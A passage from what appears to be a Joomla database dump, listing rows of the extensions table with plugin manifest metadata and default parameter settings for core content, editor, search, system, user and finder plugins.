reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"qbnz.com\\/highlighter\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_GESHI_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(406,0,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"loadmodule\"}','{\"style\":\"xhtml\"}','','',0,'2011-09-18 15:22:50',0,0),(407,0,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,0,'{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,0,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,0,'{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagenavigation\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,0,'plg_content_vote','plugin','vote','content',0,1,1,0,'{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"vote\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(410,0,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"Copyright (C) 2014 - 2017 by Marijn Haverbeke <marijnh@gmail.com> and others\",\"authorEmail\":\"marijnh@gmail.com\",\"authorUrl\":\"http:\\/\\/codemirror.net\\/\",\"version\":\"5.40.0\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"codemirror\"}','{\"lineNumbers\":\"1\",\"lineWrapping\":\"1\",\"matchTags\":\"1\",\"matchBrackets\":\"1\",\"marker-gutter\":\"1\",\"autoCloseTags\":\"1\",\"autoCloseBrackets\":\"1\",\"autoFocus\":\"1\",\"theme\":\"default\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,0,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"September 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"none\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(412,0,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,0,'{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2019\",\"author\":\"Tiny Technologies, Inc\",\"copyright\":\"Tiny Technologies, Inc\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"https:\\/\\/www.tiny.cloud\",\"version\":\"4.5.11\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tinymce\"}','{\"mode\":\"1\",\"skin\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"0\",\"lang_code\":\"en\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet,iframe\",\"extended_elements\":\"\",\"toolbar\":\"top\",\"toolbar_align\":\"left\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"true\",\"resize_horizontal\":\"false\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"format_date\":\"%Y-%m-%d\",\"inserttime\":\"1\",\"format_time\":\"%H:%M:%S\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"media\":\"1\",\"hr\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"style\":\"1\",\"layer\":\"1\",\"xhtmlxtras\":\"1\",\"visualchars\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"advimage\":\"1\",\"advlink\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,0,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"article\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(414,0,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"image\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(415,0,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(416,0,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"readmore\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(417,0,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,0,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,0,'plg_search_content','plugin','content','search',0,1,1,0,'{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,0,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(421,801,'plg_search_weblinks','plugin','weblinks','search',0,1,1,0,'{\"name\":\"plg_search_weblinks\",\"type\":\"plugin\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_SEARCH_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblinks\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,0,'plg_system_languagefilter','plugin','languagefilter','system',0,0,1,1,'{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagefilter\"}','{\"detect_browser\":\"1\",\"automatic_change\":\"1\",\"menu_associations\":\"0\",\"remove_default_prefix\":\"0\",\"lang_cookie\":\"1\",\"alternate_meta\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(423,0,'plg_system_p3p','plugin','p3p','system',0,1,1,0,'{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"p3p\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,0,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cache\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',9,0),(425,0,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"debug\"}','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',4,0),(426,0,'plg_system_log','plugin','log','system',0,1,1,1,'{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"log\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(427,0,'plg_system_redirect','plugin','redirect','system',0,1,1,1,'{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"redirect\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(428,0,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"remember\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(429,0,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"sef\"}','{}','','',0,'0000-00-00 00:00:00',8,0),(430,0,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"logout\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(431,0,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,0,'{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contactcreator\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,0,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,0,'plg_user_profile','plugin','profile','user',0,0,1,0,'{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"profile\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,0,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(435,0,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(436,0,'plg_system_languagecode','plugin','languagecode','system',0,0,1,0,'{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"languagecode\"}','{}','','',0,'0000-00-00 00:00:00',10,0),(437,0,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomlaupdate\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(438,0,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"extensionupdate\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(439,0,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,0,1,0,'{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.4.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"recaptcha\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(440,0,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'{\"name\":\"plg_system_highlight\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_HIGHLIGHT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"highlight\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(441,0,'plg_content_finder','plugin','finder','content',0,1,1,0,'{\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(442,0,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(443,0,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(444,0,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(445,0,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(446,801,'plg_finder_weblinks','plugin','weblinks','finder',0,1,1,0,'{\"name\":\"plg_finder_weblinks\",\"type\":\"plugin\",\"creationDate\":\"2021-09-19\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2021 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.9.0\",\"description\":\"PLG_FINDER_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"weblinks\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(447,0,'plg_finder_tags','plugin','tags','finder',0,1,1,0,'{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(448,0,'plg_twofactorauth_totp','plugin','totp','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"totp\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(449,0,'plg_authentication_cookie','plugin','cookie','authentication',0,1,1,0,'{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"cookie\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(450,0,'plg_twofactorauth_yubikey','plugin','yubikey','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"yubikey\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(451,0,'plg_search_tags','plugin','tags','search',0,1,1,0,'{\"name\":\"plg_search_tags\",\"type\":\"plugin\",\"creationDate\":\"March 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_TAGS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tags\"}','{\"search_limit\":\"50\",\"show_tagged_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(452,0,'plg_system_updatenotification','plugin','updatenotification','system',0,1,1,0,'{\"name\":\"plg_system_updatenotification\",\"type\":\"plugin\",\"creationDate\":\"May 2015\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2019 Open Source Matters. All rights 